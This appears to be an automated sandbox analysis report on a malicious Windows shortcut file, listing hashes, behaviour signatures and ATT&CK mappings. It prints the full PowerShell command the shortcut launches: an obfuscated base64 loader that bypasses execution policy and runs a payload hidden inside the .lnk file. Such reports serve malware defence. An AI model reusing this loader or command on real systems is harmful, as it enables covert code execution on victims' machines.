300c090861a547a4c211b15b9f45d6dcb976128c21b78b6c38d1cf4c5d998e12

Analysis

max time kernel
11s
max time network
114s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nov2018New!/ds7002.bin.lnk
Size

392KB
MD5

6ed0020b0851fb71d5b0076f4ee95f3c
SHA1

e431261c63f94a174a1308defccc674dabbe3609
SHA256

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
SHA512

2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

5012 powershell.exe
5012 powershell.exe
5012 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 5012 powershell.exe

pid	process
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe

description	pid	process
Token: SeDebugPrivilege	5012	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 4640 wrote to memory of 5012	4640	cmd.exe	powershell.exe
PID 4640 wrote to memory of 5012	4640	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Nov2018New!\ds7002.bin.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/5012-2-0x0000000000000000-mapping.dmp

Download
memory/5012-3-0x00007FF9C90A0000-0x00007FF9C9A8C000-memory.dmp

Filesize
9.9MB

Download
memory/5012-4-0x0000024CFF7C0000-0x0000024CFF7C1000-memory.dmp

Filesize
4KB

Download
memory/5012-5-0x0000024CFD7E0000-0x0000024CFD7E2000-memory.dmp

Filesize
8KB

Download
memory/5012-6-0x0000024CFD7E3000-0x0000024CFD7E5000-memory.dmp

Filesize
8KB

Download
memory/5012-7-0x0000024CFFB70000-0x0000024CFFB71000-memory.dmp

Filesize
4KB

Download
memory/5012-8-0x0000024CFD7E6000-0x0000024CFD7E8000-memory.dmp

Filesize
8KB

Download